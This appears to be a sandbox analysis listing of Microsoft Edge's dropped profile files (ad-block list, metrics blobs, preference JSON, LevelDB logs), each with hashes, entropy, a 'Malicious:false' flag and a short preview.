                                                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677D1BB6-15CC.pma

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.04804516590896966
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:h7/0m5tmznOAUJYFJ/7qiRDs0JEYg7XCJI5JEm98Rdhh+JNV9URQsAvhDnn8y08s:1/0Utkb01jizhONoWhDn08T2RGOD
                                                                                                                                                                                                                                                                                                MD5:A76E171A856A6BAF7E77369A12DAB459
                                                                                                                                                                                                                                                                                                SHA1:2414D58C632ADBE5C62712E07922B187CC3DE252
                                                                                                                                                                                                                                                                                                SHA-256:77367B264B84013BDFDD1C63CF441ACCC32FFBB0BB21A502034E714AD8B6341F
                                                                                                                                                                                                                                                                                                SHA-512:89787700D4C50F68272841E570C5096C9EB504E2F403DDDB2D87E9D04CC3A9764F139D91BB2C20DEC9F9AF944AA5A7439D96A0FDCBEC0BA58CF452BAD19821BC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@................k..h[..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".jrlkyc20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G..>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.................. .2....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677D1BB6-398.pma

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4555213358345816
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:Y2PhZv2wO5M0WP0s631/RwgOVp4oMZSAiSuqx8lIDhK8nBk+g1HF:ThZy5Zs6F/RwHvIihqxpDhK8nBk+aH
                                                                                                                                                                                                                                                                                                MD5:98ACBF9AE30FC75C5B7CB0F34FF707C1
                                                                                                                                                                                                                                                                                                SHA1:6BCAABC0ACEB34DE83D62514833DBAF3A16B1ED4
                                                                                                                                                                                                                                                                                                SHA-256:DF421CA63CE9A0353A134BBFD6141819FC05758E9137177ED0E2D6BA2A7CE82C
                                                                                                                                                                                                                                                                                                SHA-512:023B0E88D53DF3E4B91DF71A48BD9DBBDA7F504B442DDCD9D3942FA5C29AC91F8246238DC385BA8EDA632FEDCB22F904F47F2A7F268F0BB0369706721FBD6DE6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@...................`...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".jrlkyc20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K...G..>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2............... .2.............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                                                                                                                                                MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                                                                                                                                                SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                                                                                                                                                SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                                                                                                                                                SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\075ecaff-fe4e-43b3-8b6c-fb2324583fc6.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17517), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17519
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.492020860451322
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stxJ99QTryDigabatSuypwsOzyaNPtaeN9PktuYUimYwhtngS0e1/Y8EbV+FOdQA:stxPGKSu4wsOztJtHN9mAgy2bGgQwz
                                                                                                                                                                                                                                                                                                MD5:508260143544AB8934A3ABC5B367F02A
                                                                                                                                                                                                                                                                                                SHA1:2112E0864454C1E98EC5B25D0017AA6449B37EB2
                                                                                                                                                                                                                                                                                                SHA-256:1048FF716D57DC46A1245D46802307381F5DA1F26E451A0B1B1C43356C83DA27
                                                                                                                                                                                                                                                                                                SHA-512:EA692747513640F1D0DC05AF171142BFEDFDCBF3A33DE8CB6C91945156AD00C2EB8DFEE3CA82787E2051CA720C5DA55B40FB1464549F0299493DFAFD2BB5A564
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1f78bc19-4bb1-434c-b766-c970571161ec.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):37149
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.564316420305124
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:lxqOypWPKsfG78F1+UoAYDCx9Tuqh0VfUC9xbog/OVmwIPAd/rwqWfQqKputur:lxqOypWPKsfG7u1jaDwIIdMqWfJXtg
                                                                                                                                                                                                                                                                                                MD5:6D0BE52BC6B600F6DDE27421D7177034
                                                                                                                                                                                                                                                                                                SHA1:8B06AD28115183F7CA30EB7BB7A56E54A4D2A0AC
                                                                                                                                                                                                                                                                                                SHA-256:220494D2EE786880E010A622C59362F5EA917467CF90539D6EF9FAF669C4EC95
                                                                                                                                                                                                                                                                                                SHA-512:B72C0DE1A4EDE9DE731FF83A8899148E0BA953D91D6A05C6E2F71469B11CE1D2E755D9B0BEFA10B521D7C03B84A7D8D4DB1279677264BC47AA35CE76C1142947
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380725942936385","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380725942936385","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\51d713a1-8195-420f-bd4c-092a03600996.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40504
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.561227482397739
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:lxqODV7pLGLhbpWPKsfp78F1+UoAYDCx9Tuqh0VfUC9xbog/OVmwIPAd/rwqWpQd:lxqODjchbpWPKsfp7u1jaDwIIdMqWpJg
                                                                                                                                                                                                                                                                                                MD5:9B26370E6D2EA7D94E0292A2617EFC32
                                                                                                                                                                                                                                                                                                SHA1:3E80342E0540FFAE68F41A315EF6F2715BE31190
                                                                                                                                                                                                                                                                                                SHA-256:A4D17206A3489ACFD4A4E15C5B7BB154B078CAB3685B015422276A45BF622B06
                                                                                                                                                                                                                                                                                                SHA-512:7E299912E981B88D7A01263C70780EE9F06CE31A242138691BD373838689127689C25C1B51B8318E0844BCD6ECDF0D80E8DBDD25CAD8B4284268202B863EE428
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380725942936385","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380725942936385","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\962889d4-b2c7-4e56-a7a4-2c8e7f022d50.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17682), with no line terminators
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):17684
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.488648548231993
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stxJ99QTryDigabatSuypwsOzyaNPtaeN9PktuYUimYwhtngS0e1/Y8EbV+FOdQG:stxPGKSu4wsOztJtHN9mAgy2bGgQwpF
                                                                                                                                                                                                                                                                                                MD5:D41E94ED9ADA2F0D89395386DC435089
                                                                                                                                                                                                                                                                                                SHA1:E85F4C4E39FD96F13AF3C8F86F97E44B4CCE6307
                                                                                                                                                                                                                                                                                                SHA-256:940AFB879D06D3EB5F8459FEA2AF0D93CDC70F846BA5356B28C53C967CFCE197
                                                                                                                                                                                                                                                                                                SHA-512:04850F5876293FD9DE413EFAD5277E198CD0B404B7425A65280371388263A2D91115EC6C8EBC43978458871DB4D2A33CE9CE48485ADCC9B7B2A6ACA57A6A61D0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9d6315b6-f285-42a4-8a1e-15bc9d3c94f6.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13719
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.234589049081205
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stxJ99QTryDigabatSuypwsOzyaNP9ktuYUimDY8EbV+FOdQwaxNPZYJ:stxPGKSu4wsOztJArbGgQwz
                                                                                                                                                                                                                                                                                                MD5:22729E27937C44A3F143830FBCF1ECA2
                                                                                                                                                                                                                                                                                                SHA1:E2662240F980FD708F25413D97533881446A4ED0
                                                                                                                                                                                                                                                                                                SHA-256:CCC1D4F53F0F9C2044465ADA6907862100C4C879571B3A070133777920256890
                                                                                                                                                                                                                                                                                                SHA-512:E70CE793EBA7597830C3A2073B3D5D69EC57EBD52B3317186D152E13A5E9A6A0782876094A51CD6A229524B688BF9C6B278C30B876264334EA6E6BAE15E14EA3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):315
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.23901262256006
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4kB1cNwi23oH+Tcwtp3hBtB2KLl74XMM+q2PcNwi23oH+Tcwtp3hBWsIFUv:7p4SZYebp3dFLl4cM+vLZYebp3eFUv
                                                                                                                                                                                                                                                                                                MD5:3C7EF61DF6EDD65210E9986BB53AB8DF
                                                                                                                                                                                                                                                                                                SHA1:4FBE5DC0ABA28B9F7E2E063E52B4E8DDFA18E3A4
                                                                                                                                                                                                                                                                                                SHA-256:C60F01E1F8E0389644AF892D5E0956095E259DB7914A53B0EA0A24A8D3A687F1
                                                                                                                                                                                                                                                                                                SHA-512:36E1C7783190FBF11701B194BCDD3CAC450B0BA9D9B7B6E080DE50EC8D7AE36FFE92D3068860E1902849CEFF5BB10074FD96FF61F3672F4A3BDAB1516E9F0CF5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:09.712 1d8c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/07-07:19:09.724 1d8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                Download File
